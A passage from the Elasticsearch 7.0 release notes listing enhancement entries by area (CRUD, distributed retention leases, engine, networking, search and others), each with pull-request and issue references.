{es-pull}35535[#35535] -* Extract RunOnce into a dedicated class {es-pull}35489[#35489] -* Introduce elasticsearch-core jar {es-pull}28191[#28191] (issue: {es-issue}27933[#27933]) -* Rename core module to server {es-pull}28180[#28180] (issue: {es-issue}27933[#27933]) - -CRUD:: -* Rename seq# powered optimistic concurrency control parameters to ifSeqNo/ifPrimaryTerm {es-pull}36757[#36757] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Expose Sequence Number based Optimistic Concurrency Control in the rest layer {es-pull}36721[#36721] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add doc's sequence number + primary term to GetResult and use it for updates {es-pull}36680[#36680] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add seq no powered optimistic locking support to the index and delete transport actions {es-pull}36619[#36619] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add Seq# based optimistic concurrency control to UpdateRequest {es-pull}37872[#37872] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Introduce ssl settings to reindex from remote {es-pull}37527[#37527] (issues: {es-issue}29755[#29755], {es-issue}37287[#37287]) -* Use Sequence number powered OCC for processing updates {es-pull}37308[#37308] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Document Seq No powered optimistic concurrency control {es-pull}37284[#37284] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Enable IPv6 URIs in reindex from remote {es-pull}36874[#36874] -* Rename seq# powered optimistic concurrency control parameters to ifSeqNo/ifPrimaryTerm {es-pull}36757[#36757] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Expose Sequence Number based Optimistic Concurrency Control in the rest layer {es-pull}36721[#36721] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add doc's sequence number + primary term to GetResult and use it for updates {es-pull}36680[#36680] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add seq no powered optimistic locking support to the index and delete transport actions {es-pull}36619[#36619] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Set acking timeout to 0 on dynamic mapping update {es-pull}31140[#31140] (issues: {es-issue}30672[#30672], {es-issue}30844[#30844]) - -Discovery-Plugins:: -* Adds connect and read timeouts to discovery-gce {es-pull}28193[#28193] (issue: {es-issue}24313[#24313]) - -Distributed:: -* [Close Index API] Mark shard copy as stale if needed during shard verification {es-pull}36755[#36755] -* [Close Index API] Refactor MetadataIndexStateService {es-pull}36354[#36354] (issue: {es-issue}36249[#36249]) -* [Close Index API] Add TransportShardCloseAction for pre-closing verifications {es-pull}36249[#36249] -* TransportResyncReplicationAction should not honour blocks {es-pull}35795[#35795] (issues: {es-issue}35332[#35332], {es-issue}35597[#35597]) -* Expose all permits acquisition in IndexShard and TransportReplicationAction {es-pull}35540[#35540] (issue: {es-issue}33888[#33888]) -* [RCI] Check blocks while having index shard permit in TransportReplicationAction {es-pull}35332[#35332] (issue: {es-issue}33888[#33888]) -* Recover retention leases during peer recovery {es-pull}38435[#38435] (issue: {es-issue}37165[#37165]) -* Lift retention lease expiration to index shard {es-pull}38380[#38380] (issues: {es-issue}37165[#37165], {es-issue}37963[#37963], {es-issue}38070[#38070]) -* Introduce retention lease background sync {es-pull}38262[#38262] (issue: {es-issue}37165[#37165]) -* Allow shards of closed indices to be replicated as regular shards {es-pull}38024[#38024] (issue: {es-issue}33888[#33888]) -* Expose retention leases in shard stats {es-pull}37991[#37991] (issue: {es-issue}37165[#37165]) -* Introduce retention leases versioning {es-pull}37951[#37951] (issue: {es-issue}37165[#37165]) -* Soft-deletes policy should always fetch latest leases {es-pull}37940[#37940] (issues: {es-issue}37165[#37165], {es-issue}37375[#37375]) -* Sync retention leases on expiration {es-pull}37902[#37902] (issue: {es-issue}37165[#37165]) -* Ignore shard started requests when primary term does not match {es-pull}37899[#37899] (issue: {es-issue}33888[#33888]) -* Move update and delete by query to use seq# for optimistic concurrency control {es-pull}37857[#37857] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148], {es-issue}37639[#37639]) -* Introduce retention lease serialization {es-pull}37447[#37447] (issues: {es-issue}37165[#37165], {es-issue}37398[#37398]) -* Add run under primary permit method {es-pull}37440[#37440] (issue: {es-issue}37398[#37398]) -* Introduce retention lease syncing {es-pull}37398[#37398] (issue: {es-issue}37165[#37165]) -* Introduce retention lease persistence {es-pull}37375[#37375] (issue: {es-issue}37165[#37165]) -* Add validation for retention lease construction {es-pull}37312[#37312] (issue: {es-issue}37165[#37165]) -* Introduce retention lease expiration {es-pull}37195[#37195] (issue: {es-issue}37165[#37165]) -* Introduce shard history retention leases {es-pull}37167[#37167] (issue: {es-issue}37165[#37165]) -* [Close Index API] Add unique UUID to ClusterBlock {es-pull}36775[#36775] -* [Close Index API] Mark shard copy as stale if needed during shard verification {es-pull}36755[#36755] -* [Close Index API] Propagate tasks ids between Freeze, Close and Verify Shard actions {es-pull}36630[#36630] -* Always initialize the global checkpoint {es-pull}34381[#34381] -* Introduce retention lease actions {es-pull}38756[#38756] (issue: {es-issue}37165[#37165]) -* Add dedicated retention lease exceptions {es-pull}38754[#38754] (issue: {es-issue}37165[#37165]) -* Copy retention leases when trim unsafe commits {es-pull}37995[#37995] (issue: {es-issue}37165[#37165]) -* Allow retention lease operations under blocks {es-pull}39089[#39089] (issues: {es-issue}34648[#34648], {es-issue}37165[#37165]) -* Remove retention leases when unfollowing {es-pull}39088[#39088] (issues: {es-issue}34648[#34648], {es-issue}37165[#37165]) -* Introduce retention lease state file {es-pull}39004[#39004] (issues: {es-issue}37165[#37165], {es-issue}38588[#38588], {es-issue}39032[#39032]) -* Enable soft-deletes by default for 7.0+ indices {es-pull}38929[#38929] (issue: {es-issue}36141[#36141]) - -Engine:: -* Remove versionType from translog {es-pull}31945[#31945] -* Do retry if primary fails on AsyncAfterWriteAction {es-pull}31857[#31857] (issues: {es-issue}31716[#31716], {es-issue}31755[#31755]) -* handle AsyncAfterWriteAction exception before listener is registered {es-pull}31755[#31755] (issue: {es-issue}31716[#31716]) -* Use IndexWriter#flushNextBuffer to free memory {es-pull}27753[#27753] -* Remove pre 6.0.0 support from InternalEngine {es-pull}27720[#27720] -* Add sequence numbers based optimistic concurrency control support to Engine {es-pull}36467[#36467] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Require soft-deletes when access changes snapshot {es-pull}36446[#36446] -* Use delCount of SegmentInfos to calculate numDocs {es-pull}36323[#36323] -* Always configure soft-deletes field of IndexWriterConfig {es-pull}36196[#36196] (issue: {es-issue}36141[#36141]) -* Enable soft-deletes by default on 7.0.0 or later {es-pull}36141[#36141] -* Always return false from `refreshNeeded` on ReadOnlyEngine {es-pull}35837[#35837] (issue: {es-issue}35785[#35785]) -* Add a `_freeze` / `_unfreeze` API {es-pull}35592[#35592] (issue: {es-issue}34352[#34352]) -* [RCI] Add IndexShardOperationPermits.asyncBlockOperations(ActionListener) {es-pull}34902[#34902] (issue: {es-issue}33888[#33888]) -* Specialize pre-closing checks for engine implementations {es-pull}38702[#38702] -* Ensure that max seq # is equal to the global checkpoint when creating ReadOnlyEngines {es-pull}37426[#37426] -* Enable Bulk-Merge if all source remains {es-pull}37269[#37269] -* Rename setting to enable mmap {es-pull}37070[#37070] (issue: {es-issue}36668[#36668]) -* Add hybridfs store type {es-pull}36668[#36668] -* Introduce time-based retention policy for soft-deletes {es-pull}34943[#34943] (issue: {es-issue}34908[#34908]) -* Handle AsyncAfterWriteAction failure on primary in the same way as failures on replicas {es-pull}31969[#31969] (issues: {es-issue}31716[#31716], {es-issue}31755[#31755]) -* Explicitly advance max_seq_no before indexing {es-pull}39473[#39473] (issue: {es-issue}38879[#38879]) -* Also mmap cfs files for hybridfs {es-pull}38940[#38940] (issue: {es-issue}36668[#36668]) - -Features/CAT APIs:: -* Expose `search.throttled` on `_cat/indices` {es-pull}37073[#37073] (issue: {es-issue}34352[#34352]) - -Features/Features:: -* Run Node deprecation checks locally (#38065) {es-pull}38250[#38250] (issue: {es-issue}38065[#38065]) - -Features/ILM:: -* Ensure ILM policies run safely on leader indices {es-pull}38140[#38140] (issue: {es-issue}34648[#34648]) -* Skip Shrink when numberOfShards not changed {es-pull}37953[#37953] (issue: {es-issue}33275[#33275]) -* Inject Unfollow before Rollover and Shrink {es-pull}37625[#37625] (issue: {es-issue}34648[#34648]) -* Add set_priority action to ILM {es-pull}37397[#37397] (issue: {es-issue}36905[#36905]) -* Add Freeze Action {es-pull}36910[#36910] (issue: {es-issue}34630[#34630]) - -Features/Indices APIs:: -* Add cluster-wide shard limit {es-pull}32856[#32856] (issue: {es-issue}20705[#20705]) -* Remove RestGetAllAliasesAction {es-pull}31308[#31308] (issue: {es-issue}31129[#31129]) -* Add rollover-creation-date setting to rolled over index {es-pull}31144[#31144] (issue: {es-issue}30887[#30887]) -* add is-write-index flag to aliases {es-pull}30942[#30942] -* Make index and bulk APIs work without types. {es-pull}29479[#29479] -* Simplify deprecation issue levels {es-pull}36326[#36326] -* New mapping signature and mapping string source fixed. {es-pull}37401[#37401] - -Features/Ingest:: -* Add ignore_missing property to foreach filter (#22147) {es-pull}31578[#31578] (issue: {es-issue}22147[#22147]) -* Compile mustache template only if field includes '{{'' {es-pull}37207[#37207] (issue: {es-issue}37120[#37120]) -* Move ingest-geoip default databases out of config {es-pull}36949[#36949] (issue: {es-issue}36898[#36898]) -* Make the ingest-geoip databases even lazier to load {es-pull}36679[#36679] -* Updates the grok patterns to be consistent with the logstash {es-pull}27181[#27181] - -Features/Java High Level REST Client:: -* HLRC API for _termvectors {es-pull}32610[#32610] (issue: {es-issue}27205[#27205]) -* Fix strict setting exception handling {es-pull}37247[#37247] (issue: {es-issue}37090[#37090]) -* Use nonblocking entity for requests {es-pull}32249[#32249] - -Features/Monitoring:: -* Make Exporters Async {es-pull}35765[#35765] (issue: {es-issue}35743[#35743]) -* Adding mapping for hostname field {es-pull}37288[#37288] -* Remove types from internal monitoring templates and bump to api 7 {es-pull}39888[#39888] (issue: {es-issue}38637[#38637]) - -Features/Stats:: -* Stats to record how often the ClusterState diff mechanism is used successfully {es-pull}26973[#26973] -* Add JVM dns cache expiration config to JvmInfo {es-pull}36372[#36372] - -Features/Watcher:: -* Validate email adresses when storing a watch {es-pull}34042[#34042] (issue: {es-issue}33980[#33980]) -* Move watcher to use seq# and primary term for concurrency control {es-pull}37977[#37977] (issues: {es-issue}10708[#10708], {es-issue}37872[#37872]) -* Use ILM for Watcher history deletion {es-pull}37443[#37443] (issue: {es-issue}32041[#32041]) -* Add whitelist to HttpClient {es-pull}36817[#36817] (issue: {es-issue}29937[#29937]) -* Remove the index type from internal watcher indexes {es-pull}39761[#39761] (issue: {es-issue}38637[#38637]) - -Geo:: -* Adds a name of the field to geopoint parsing errors {es-pull}36529[#36529] (issue: {es-issue}15965[#15965]) -* Add support to ShapeBuilders for building Lucene geometry {es-pull}35707[#35707] (issue: {es-issue}35320[#35320]) -* Add ST_WktToSQL function {es-pull}35416[#35416] (issue: {es-issue}29872[#29872]) - -Index APIs:: -* Add cluster-wide shard limit warnings {es-pull}34021[#34021] (issues: {es-issue}20705[#20705], {es-issue}32856[#32856]) - -Infra/Circuit Breakers:: -* Have circuit breaker succeed on unknown mem usage {es-pull}33125[#33125] (issue: {es-issue}31767[#31767]) -* Account for XContent overhead in in-flight breaker {es-pull}31613[#31613] -* Script Stats: Add compilation limit counter to stats {es-pull}26387[#26387] - -Infra/Core:: -* Add RunOnce utility class that executes a Runnable exactly once {es-pull}35484[#35484] -* Improved IndexNotFoundException's default error message {es-pull}34649[#34649] (issue: {es-issue}34628[#34628]) -* fix a few versionAdded values in ElasticsearchExceptions {es-pull}37877[#37877] -* Add simple method to write collection of writeables {es-pull}37448[#37448] (issue: {es-issue}37398[#37398]) -* Date/Time parsing: Use java time API instead of exception handling {es-pull}37222[#37222] -* [API] spelling: interruptible {es-pull}37049[#37049] (issue: {es-issue}37035[#37035]) -* Enhancements to IndicesQueryCache. {es-pull}39099[#39099] (issue: {es-issue}37117[#37117]) -* Change zone formatting for all printers {es-pull}39568[#39568] (issue: {es-issue}38471[#38471]) - -Infra/Logging:: -* Trim the JSON source in indexing slow logs {es-pull}38081[#38081] (issue: {es-issue}38080[#38080]) -* Optimize warning header de-duplication {es-pull}37725[#37725] (issues: {es-issue}35754[#35754], {es-issue}37530[#37530], {es-issue}37597[#37597], {es-issue}37622[#37622]) -* Remove warn-date from warning headers {es-pull}37622[#37622] (issues: {es-issue}35754[#35754], {es-issue}37530[#37530], {es-issue}37597[#37597]) -* Add some deprecation optimizations {es-pull}37597[#37597] (issues: {es-issue}35754[#35754], {es-issue}37530[#37530]) -* Only update response headers if we have a new one {es-pull}37590[#37590] (issues: {es-issue}35754[#35754], {es-issue}37530[#37530]) - -Infra/Packaging:: -* Choose JVM options ergonomically {es-pull}30684[#30684] -* Add OS/architecture classifier to distributions {es-pull}37881[#37881] -* Change file descriptor limit to 65535 {es-pull}37537[#37537] (issue: {es-issue}35839[#35839]) -* Exit batch files explictly using ERRORLEVEL {es-pull}29583[#29583] (issue: {es-issue}29582[#29582]) -* Add no-jdk distributions {es-pull}39882[#39882] -* Allow AVX-512 on JDK 11+ {es-pull}40828[#40828] (issue: {es-issue}32138[#32138]) - -Infra/REST API:: -* Remove hand-coded XContent duplicate checks {es-pull}34588[#34588] (issues: {es-issue}22073[#22073], {es-issue}22225[#22225], {es-issue}22253[#22253]) -* Add the `include_type_name` option to the search and document APIs. {es-pull}29506[#29506] (issue: {es-issue}15613[#15613]) -* Validate `op_type` for `_create` {es-pull}27483[#27483] - -Infra/Scripting:: -* Tests: Add support for custom contexts to mock scripts {es-pull}34100[#34100] -* Reflect factory signatures in painless classloader {es-pull}34088[#34088] -* Handle missing values in painless {es-pull}32207[#32207] (issue: {es-issue}29286[#29286]) -* Add getZone to JodaCompatibleZonedDateTime {es-pull}37084[#37084] -* [Painless] Add boxed type to boxed type casts for method/return {es-pull}36571[#36571] - -Infra/Packaging:: -* Use bundled JDK in Docker images {es-pull}40238[#40238] -* Upgrade bundled JDK and Docker images to JDK 12 {es-pull}40229[#40229] -* Bundle java in distributions {es-pull}38013[#38013] (issue: {es-issue}31845[#31845]) - -Infra/Settings:: -* Settings: Add keystore creation to add commands {es-pull}26126[#26126] -* Separate out validation of groups of settings {es-pull}34184[#34184] -* Provide a clearer error message on keystore add {es-pull}39327[#39327] (issue: {es-issue}39324[#39324]) - -Infra/Transport API:: -* Change BWC version for VerifyRepositoryResponse {es-pull}30796[#30796] (issue: {es-issue}30762[#30762]) - -Ingest:: -* Grok fix duplicate patterns JAVACLASS and JAVAFILE {es-pull}35886[#35886] -* Implement Drop Processor {es-pull}32278[#32278] (issue: {es-issue}23726[#23726]) - -Java High Level REST Client:: -* Add get users action {es-pull}36332[#36332] (issue: {es-issue}29827[#29827]) -* Add delete template API {es-pull}36320[#36320] (issue: {es-issue}27205[#27205]) -* Implement get-user-privileges API {es-pull}36292[#36292] -* Get Deprecation Info API {es-pull}36279[#36279] (issue: {es-issue}29827[#29827]) -* Add support for Follow Stats API {es-pull}36253[#36253] (issue: {es-issue}33824[#33824]) -* Add support for CCR Stats API {es-pull}36213[#36213] (issue: {es-issue}33824[#33824]) -* Put Role {es-pull}36209[#36209] (issue: {es-issue}29827[#29827]) -* Add index templates exist API {es-pull}36132[#36132] (issue: {es-issue}27205[#27205]) -* Add support for CCR Get Auto Follow Pattern apis {es-pull}36049[#36049] (issue: {es-issue}33824[#33824]) -* Add support for CCR Delete Auto Follow Pattern API {es-pull}35981[#35981] (issue: {es-issue}33824[#33824]) -* Remove fromXContent from IndexUpgradeInfoResponse {es-pull}35934[#35934] -* Add delete expired data API {es-pull}35906[#35906] (issue: {es-issue}29827[#29827]) -* Execute watch API {es-pull}35868[#35868] (issue: {es-issue}29827[#29827]) -* Add ability to put user with a password hash {es-pull}35844[#35844] (issue: {es-issue}35242[#35242]) -* Add ML find file structure API {es-pull}35833[#35833] (issue: {es-issue}29827[#29827]) -* Add support for get roles API {es-pull}35787[#35787] (issue: {es-issue}29827[#29827]) -* Added support for CCR Put Auto Follow Pattern API {es-pull}35780[#35780] (issue: {es-issue}33824[#33824]) -* XPack ML info action {es-pull}35777[#35777] (issue: {es-issue}29827[#29827]) -* ML Delete event from Calendar {es-pull}35760[#35760] (issue: {es-issue}29827[#29827]) -* Add ML revert model snapshot API {es-pull}35750[#35750] (issue: {es-issue}29827[#29827]) -* ML Get Calendar Events {es-pull}35747[#35747] (issue: {es-issue}29827[#29827]) -* Add high-level REST client API for `_freeze` and `_unfreeze` {es-pull}35723[#35723] (issue: {es-issue}34352[#34352]) -* Fix issue in equals impl for GlobalOperationPrivileges {es-pull}35721[#35721] -* ML Delete job from calendar {es-pull}35713[#35713] (issue: {es-issue}29827[#29827]) -* ML Add Event To Calendar API {es-pull}35704[#35704] (issue: {es-issue}29827[#29827]) -* Add ML update model snapshot API (#35537) {es-pull}35694[#35694] (issue: {es-issue}29827[#29827]) -* Add support for CCR Unfollow API {es-pull}35693[#35693] (issue: {es-issue}33824[#33824]) -* Clean up PutLicenseResponse {es-pull}35689[#35689] (issue: {es-issue}35547[#35547]) -* Clean up StartBasicResponse {es-pull}35688[#35688] (issue: {es-issue}35547[#35547]) -* Add support for put privileges API {es-pull}35679[#35679] -* ML Add Job to Calendar API {es-pull}35666[#35666] (issue: {es-issue}29827[#29827]) -* Add support for CCR Resume Follow API {es-pull}35638[#35638] (issue: {es-issue}33824[#33824]) -* Add support for get application privileges API {es-pull}35556[#35556] (issue: {es-issue}29827[#29827]) -* Clean up XPackInfoResponse class and related tests {es-pull}35547[#35547] -* Add parameters to stopRollupJob API {es-pull}35545[#35545] (issue: {es-issue}34811[#34811]) -* Add ML delete model snapshot API {es-pull}35537[#35537] (issue: {es-issue}29827[#29827]) -* Add get watch API {es-pull}35531[#35531] (issue: {es-issue}29827[#29827]) -* Add ML Update Filter API {es-pull}35522[#35522] (issue: {es-issue}29827[#29827]) -* Add ml get filters api {es-pull}35502[#35502] (issue: {es-issue}29827[#29827]) -* Add ML get model snapshots API {es-pull}35487[#35487] (issue: {es-issue}29827[#29827]) -* Add "_has_privileges" API to Security Client {es-pull}35479[#35479] (issue: {es-issue}29827[#29827]) -* Add Delete Privileges API to HLRC {es-pull}35454[#35454] (issue: {es-issue}29827[#29827]) -* Add support for CCR Put Follow API {es-pull}35409[#35409] -* Add ML delete filter action {es-pull}35382[#35382] (issue: {es-issue}29827[#29827]) -* Add delete user action {es-pull}35294[#35294] (issue: {es-issue}29827[#29827]) -* HLRC for _mtermvectors {es-pull}35266[#35266] (issues: {es-issue}27205[#27205], {es-issue}33447[#33447]) -* Reindex API with wait_for_completion false {es-pull}35202[#35202] (issue: {es-issue}27205[#27205]) -* Add watcher stats API {es-pull}35185[#35185] (issue: {es-issue}29827[#29827]) -* HLRC support for getTask {es-pull}35166[#35166] (issue: {es-issue}27205[#27205]) -* Add GetRollupIndexCaps API {es-pull}35102[#35102] (issue: {es-issue}29827[#29827]) -* HLRC: migration api - upgrade {es-pull}34898[#34898] (issue: {es-issue}29827[#29827]) -* Add stop rollup job support to HL REST Client {es-pull}34702[#34702] (issue: {es-issue}29827[#29827]) -* Bulk Api support for global parameters {es-pull}34528[#34528] (issue: {es-issue}26026[#26026]) -* Add delete rollup job support to HL REST Client {es-pull}34066[#34066] (issue: {es-issue}29827[#29827]) -* Add support for get license basic/trial status API {es-pull}33176[#33176] (issue: {es-issue}29827[#29827]) -* Add machine learning open job {es-pull}32860[#32860] (issue: {es-issue}29827[#29827]) -* Add ML HLRC wrapper and put_job API call {es-pull}32726[#32726] -* Add Get Snapshots High Level REST API {es-pull}31537[#31537] (issue: {es-issue}27205[#27205]) - -Java Low Level REST Client:: -* On retry timeout add root exception {es-pull}25576[#25576] - -License:: -* Require acknowledgement to start_trial license {es-pull}30135[#30135] (issue: {es-issue}30134[#30134]) -* Handle malformed license signatures {es-pull}37137[#37137] (issue: {es-issue}35340[#35340]) - -Machine Learning:: -* Create the ML annotations index {es-pull}36731[#36731] (issues: {es-issue}26034[#26034], {es-issue}33376[#33376]) -* Split in batches and migrate all jobs and datafeeds {es-pull}36716[#36716] (issue: {es-issue}32905[#32905]) -* Add cluster setting to enable/disable config migration {es-pull}36700[#36700] (issue: {es-issue}32905[#32905]) -* Add audits when deprecation warnings occur with datafeed start {es-pull}36233[#36233] -* Add lazy parsing for DatafeedConfig:Aggs,Query {es-pull}36117[#36117] -* Add support for lazy nodes (#29991) {es-pull}34538[#34538] (issue: {es-issue}29991[#29991]) -* Move ML Optimistic Concurrency Control to Seq No {es-pull}38278[#38278] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add explanation so far to file structure finder exceptions {es-pull}38191[#38191] (issue: {es-issue}29821[#29821]) -* Add reason field in JobTaskState {es-pull}38029[#38029] (issue: {es-issue}34431[#34431]) -* Add _meta information to all ML indices {es-pull}37964[#37964] -* Add upgrade mode docs, hlrc, and fix bug {es-pull}37942[#37942] -* Tighten up use of aliases rather than concrete indices {es-pull}37874[#37874] -* Add support for single bucket aggs in Datafeeds {es-pull}37544[#37544] (issue: {es-issue}36838[#36838]) -* Create the ML annotations index {es-pull}36731[#36731] (issues: {es-issue}26034[#26034], {es-issue}33376[#33376]) -* Merge the Jindex master feature branch {es-pull}36702[#36702] (issue: {es-issue}32905[#32905]) -* Add cluster setting to enable/disable config migration {es-pull}36700[#36700] (issue: {es-issue}32905[#32905]) -* Allow stop unassigned datafeed and relax unset upgrade mode wait {es-pull}39034[#39034] - -Mapping:: -* Log document id when MapperParsingException occurs {es-pull}37800[#37800] (issue: {es-issue}37658[#37658]) -* [API] spelling: unknown {es-pull}37056[#37056] (issue: {es-issue}37035[#37035]) -* Make SourceToParse immutable {es-pull}36971[#36971] -* Use index-prefix fields for terms of length min_chars - 1 {es-pull}36703[#36703] -* Introduce a parameter suppress_types_warnings. {es-pull}38923[#38923] - -Network:: -* Add cors support to NioHttpServerTransport {es-pull}30827[#30827] (issue: {es-issue}28898[#28898]) -* Reintroduce mandatory http pipelining support {es-pull}30820[#30820] -* Make http pipelining support mandatory {es-pull}30695[#30695] (issues: {es-issue}28898[#28898], {es-issue}29500[#29500]) -* Add nio http server transport {es-pull}29587[#29587] (issue: {es-issue}28898[#28898]) -* Add class for serializing message to bytes {es-pull}29384[#29384] (issue: {es-issue}28898[#28898]) -* Selectors operate on channel contexts {es-pull}28468[#28468] (issue: {es-issue}27260[#27260]) -* Unify nio read / write channel contexts {es-pull}28160[#28160] (issue: {es-issue}27260[#27260]) -* Create nio-transport plugin for NioTransport {es-pull}27949[#27949] (issue: {es-issue}27260[#27260]) -* Add elasticsearch-nio jar for base nio classes {es-pull}27801[#27801] (issue: {es-issue}27802[#27802]) -* Unify transport settings naming {es-pull}36623[#36623] -* Add sni name to SSLEngine in netty transport {es-pull}33144[#33144] (issue: {es-issue}32517[#32517]) -* Add cors support to NioHttpServerTransport {es-pull}30827[#30827] (issue: {es-issue}28898[#28898]) -* Reintroduce mandatory http pipelining support {es-pull}30820[#30820] -* Make http pipelining support mandatory {es-pull}30695[#30695] (issues: {es-issue}28898[#28898], {es-issue}29500[#29500]) -* Add nio http server transport {es-pull}29587[#29587] (issue: {es-issue}28898[#28898]) -* Selectors operate on channel contexts {es-pull}28468[#28468] (issue: {es-issue}27260[#27260]) -* Unify nio read / write channel contexts {es-pull}28160[#28160] (issue: {es-issue}27260[#27260]) -* Create nio-transport plugin for NioTransport {es-pull}27949[#27949] (issue: {es-issue}27260[#27260]) -* Add elasticsearch-nio jar for base nio classes {es-pull}27801[#27801] (issue: {es-issue}27802[#27802]) -* Add NioGroup for use in different transports {es-pull}27737[#27737] (issue: {es-issue}27260[#27260]) -* Add read timeouts to http module {es-pull}27713[#27713] -* Implement byte array reusage in `NioTransport` {es-pull}27696[#27696] (issue: {es-issue}27563[#27563]) -* Introduce resizable inbound byte buffer {es-pull}27551[#27551] (issue: {es-issue}27563[#27563]) -* Decouple nio constructs from the tcp transport {es-pull}27484[#27484] (issue: {es-issue}27260[#27260]) -* Remove manual tracking of registered channels {es-pull}27445[#27445] (issue: {es-issue}27260[#27260]) -* Remove tcp profile from low level nio channel {es-pull}27441[#27441] (issue: {es-issue}27260[#27260]) -* Decouple `ChannelFactory` from Tcp classes {es-pull}27286[#27286] (issue: {es-issue}27260[#27260]) -* Enable TLSv1.3 by default for JDKs with support {es-pull}38103[#38103] (issue: {es-issue}32276[#32276]) - -Packaging:: -* Introduce Docker images build {es-pull}36246[#36246] -* Move creation of temporary directory to Java {es-pull}36002[#36002] (issue: {es-issue}31003[#31003]) - -Percolator:: -* Make the `type` parameter optional when percolating existing documents. {es-pull}39987[#39987] (issue: {es-issue}39963[#39963]) -* Add support for selecting percolator query candidate matches containing geo_point based queries {es-pull}26040[#26040] - -Plugins:: -* Plugin install: don't print download progress in batch mode {es-pull}36361[#36361] - -Ranking:: -* Add k parameter to PrecisionAtK metric {es-pull}27569[#27569] -* Vector field {es-pull}33022[#33022] (issue: {es-issue}31615[#31615]) - -Recovery:: -* SyncedFlushService.getShardRoutingTable() should use metadata to check for index existence {es-pull}37691[#37691] (issue: {es-issue}33888[#33888]) -* Make prepare engine step of recovery source non-blocking {es-pull}37573[#37573] (issue: {es-issue}37174[#37174]) -* Make recovery source send operations non-blocking {es-pull}37503[#37503] (issue: {es-issue}37458[#37458]) -* Prepare to make send translog of recovery non-blocking {es-pull}37458[#37458] (issue: {es-issue}37291[#37291]) -* Make finalize step of recovery source non-blocking {es-pull}37388[#37388] (issue: {es-issue}37291[#37291]) -* Make recovery source partially non-blocking {es-pull}37291[#37291] (issue: {es-issue}36195[#36195]) -* Do not mutate RecoveryResponse {es-pull}37204[#37204] (issue: {es-issue}37174[#37174]) -* Don't block on peer recovery on the target side {es-pull}37076[#37076] (issue: {es-issue}36195[#36195]) -* Reduce recovery time with compress or secure transport {es-pull}36981[#36981] (issue: {es-issue}33844[#33844]) -* Translog corruption marker {es-pull}33415[#33415] (issue: {es-issue}31389[#31389]) -* Do not wait for advancement of checkpoint in recovery {es-pull}39006[#39006] (issues: {es-issue}38949[#38949], {es-issue}39000[#39000]) - -Rollup:: -* Add non-X-Pack centric rollup endpoints {es-pull}36383[#36383] (issues: {es-issue}35958[#35958], {es-issue}35962[#35962]) -* Add more diagnostic stats to job {es-pull}35471[#35471] -* Add `wait_for_completion` option to StopRollupJob API {es-pull}34811[#34811] (issue: {es-issue}34574[#34574]) -* Replace the TreeMap in the composite aggregation {es-pull}36675[#36675] - -Recovery:: -* Exposed engine must include all operations below global checkpoint during rollback {es-pull}36159[#36159] (issue: {es-issue}32867[#32867]) - -Scripting:: -* Update joda compat methods to use compat class {es-pull}36654[#36654] -* [Painless] Add boxed type to boxed type casts for method/return {es-pull}36571[#36571] -* [Painless] Add def to boxed type casts {es-pull}36506[#36506] - -Settings:: -* Add user-defined cluster metadata {es-pull}33325[#33325] (issue: {es-issue}33220[#33220]) - -Search:: -* Make limit on number of expanded fields configurable {es-pull}35284[#35284] (issues: {es-issue}26541[#26541], {es-issue}34778[#34778]) -* Search: Simply SingleFieldsVisitor {es-pull}34052[#34052] -* Don't count hits via the collector if the hit count can be computed from index stats. {es-pull}33701[#33701] -* Limit the number of concurrent requests per node {es-pull}31206[#31206] (issue: {es-issue}31192[#31192]) -* Default max concurrent search req. numNodes * 5 {es-pull}31171[#31171] (issues: {es-issue}30783[#30783], {es-issue}30994[#30994]) -* Change ScriptException status to 400 (bad request) {es-pull}30861[#30861] (issue: {es-issue}12315[#12315]) -* Change default value to true for transpositions parameter of fuzzy query {es-pull}26901[#26901] -* Introducing "took" time (in ms) for `_msearch` {es-pull}23767[#23767] (issue: {es-issue}23131[#23131]) -* Add copy constructor to SearchRequest {es-pull}36641[#36641] (issue: {es-issue}32125[#32125]) -* Add raw sort values to SearchSortValues transport serialization {es-pull}36617[#36617] (issue: {es-issue}32125[#32125]) -* Add sort and collapse info to SearchHits transport serialization {es-pull}36555[#36555] (issue: {es-issue}32125[#32125]) -* Add default methods to DocValueFormat {es-pull}36480[#36480] -* Respect indices options on _msearch {es-pull}35887[#35887] -* Allow efficient can_match phases on frozen indices {es-pull}35431[#35431] (issues: {es-issue}34352[#34352], {es-issue}34357[#34357]) -* Add a new query type - ScriptScoreQuery {es-pull}34533[#34533] (issues: {es-issue}23850[#23850], {es-issue}27588[#27588], {es-issue}30303[#30303]) -* Tie break on cluster alias when merging shard search failures {es-pull}38715[#38715] (issue: {es-issue}38672[#38672]) -* Add finalReduce flag to SearchRequest {es-pull}38104[#38104] (issues: {es-issue}37000[#37000], {es-issue}37838[#37838]) -* Streamline skip_unavailable handling {es-pull}37672[#37672] (issue: {es-issue}32125[#32125]) -* Expose sequence number and primary terms in search responses {es-pull}37639[#37639] -* Add support for merging multiple search responses into one {es-pull}37566[#37566] (issue: {es-issue}32125[#32125]) -* Allow field types to optimize phrase prefix queries {es-pull}37436[#37436] (issue: {es-issue}31921[#31921]) -* Add support for providing absolute start time to SearchRequest {es-pull}37142[#37142] (issue: {es-issue}32125[#32125]) -* Ensure that local cluster alias is never treated as remote {es-pull}37121[#37121] (issues: {es-issue}32125[#32125], {es-issue}36997[#36997]) -* [API] spelling: cacheable {es-pull}37047[#37047] (issue: {es-issue}37035[#37035]) -* Add ability to suggest shard_size on coord node rewrite {es-pull}37017[#37017] (issues: {es-issue}32125[#32125], {es-issue}36997[#36997], {es-issue}37000[#37000]) -* Skip final reduction if SearchRequest holds a cluster alias {es-pull}37000[#37000] (issues: {es-issue}32125[#32125], {es-issue}36997[#36997]) -* Add support for local cluster alias to SearchRequest {es-pull}36997[#36997] (issue: {es-issue}32125[#32125]) -* 